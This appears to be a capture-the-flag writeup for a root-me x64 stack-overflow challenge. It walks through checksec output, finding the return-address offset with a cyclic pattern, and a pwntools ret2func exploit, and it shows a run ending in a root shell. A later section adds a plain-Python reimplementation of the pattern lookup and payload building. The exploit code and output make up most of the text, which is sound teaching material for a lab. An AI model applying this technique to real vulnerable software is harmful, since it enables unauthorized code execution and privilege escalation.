
Steps

checksec:

    Arch: amd64-64-little
    RELRO: Full RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: No PIE (0x400000)

No stack canary, so the saved return address can be overwritten directly; no PIE, so the binary is always mapped at 0x400000 and the address of `callMeMaybe` taken from the ELF symbol table is valid at runtime. NX only matters if we wanted to run shellcode from the stack, which we don't: we return into an existing function.
Plan: overwrite the saved return address of `main` with the address of `callMeMaybe` (the crash below is at 0x400728 inside `main`, i.e. `main` returns to the overwritten slot).

Calculate the distance from the start of the buffer to the saved return address: feed the binary a cyclic pattern (`pattern_create` in gdb-peda), read the bytes that landed in the return slot when it crashes, and look them up with `pattern_offset`:

    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    0x0000000000400728 in main ()
    gdb-peda$ pattern_offset A%JA%fA%5A
    A%JA%fA%5A found at offset: 280
exploit (Python 3 / current pwntools; payloads are `bytes`):

```python
from pwn import *

p = process('./ch35')
elf = ELF('./ch35')

# No PIE: the symbol address is the runtime address.
sh = elf.symbols['callMeMaybe']

# 280 bytes of filler reach the saved return address of main,
# then the little-endian address of callMeMaybe replaces it.
payload = b'a' * 280 + p64(sh)
print(payload)

p.sendline(payload)
p.interactive()
```
run it:
⚡ [email protected] /mnt/hgfs/pwnexc/root-me/x64 stack overflow basic python exp_ch35.py
[+] Starting local process './ch35': pid 4337
[*] '/mnt/hgfs/pwnexc/root-me/x64 stack overflow basic/ch35'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
(printed payload: 280 × 'a' followed by the 8 little-endian bytes of the `callMeMaybe` address; the raw bytes were garbled in extraction)
[*] Switching to interactive mode
Hello aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaax1b
$ id
uid=0(root) gid=0(root) groups=0(root)
$
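The two mechanical parts of this exploit, the cyclic-pattern offset lookup and the payload layout, are easy to take on faith from gdb-peda and pwntools. The following is an added example, not code from the writeup or from root-me, that reimplements both without pwntools so the arithmetic is visible: a De Bruijn cyclic pattern (the scheme pwntools `cyclic`/`cyclic_find` use; gdb-peda's `pattern_create` uses a different charset, so its `A%JA%fA%5A` will not match this pattern) and a `build_payload` that packs the target address little-endian after the filler. `CALL_ME_MAYBE = 0x400700` is a placeholder standing in for the real symbol address, which the page does not print.

```python
import struct
from itertools import islice

# Placeholder for elf.symbols['callMeMaybe']; the real value comes from the ELF.
CALL_ME_MAYBE = 0x400700

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: bytes, n: int):
    """Yield a De Bruijn sequence B(k, n): every n-byte window over the
    alphabet appears exactly once, so an n-byte window pins down its offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the cyclic pattern (what pattern_create emits)."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(subseq: bytes, n: int = 4) -> int:
    """Offset of the n-byte window `subseq` in the pattern, or -1.
    Feed it the bytes that landed in the return slot at the crash."""
    needle = subseq[:n]
    window = bytearray()
    for i, b in enumerate(de_bruijn(ALPHABET, n)):
        window.append(b)
        if len(window) > n:
            del window[0]
        if len(window) == n and bytes(window) == needle:
            return i - n + 1
    return -1


def build_payload(offset: int, target: int, filler: bytes = b"a") -> bytes:
    """`offset` filler bytes up to the saved return address, then the
    8-byte little-endian target (same layout as b'a'*280 + p64(sh))."""
    return filler * offset + struct.pack("<Q", target)


def bad_bytes(payload: bytes, bad: bytes = b"\n") -> list:
    """Positions of bytes that would truncate the input before the return
    slot is fully written (e.g. '\\n' when the program reads with gets/fgets).
    Does not flag NUL: gets() passes it through, and the high bytes of a
    0x400000-range address are always NUL."""
    return [i for i, b in enumerate(payload) if bytes([b]) in bad]


if __name__ == "__main__":
    pattern = cyclic(300)
    # Pretend the crash showed these 4 bytes in the return slot:
    leaked = pattern[280:284]
    off = cyclic_find(leaked)
    print(f"offset {off}")                       # offset 280
    payload = build_payload(off, CALL_ME_MAYBE)
    print(len(payload), payload[-8:])           # 288 b'\x00\x07@\x00\x00\x00\x00\x00'
    print("bad bytes at", bad_bytes(payload))   # bad bytes at []
```

The sanity checks are the ones worth running before sending anything: the recovered offset must reproduce the `pattern_offset` result (280 here), and the packed address must contain no byte the program's input routine treats as a terminator, otherwise the return slot is only partially overwritten and the crash looks like a wrong offset.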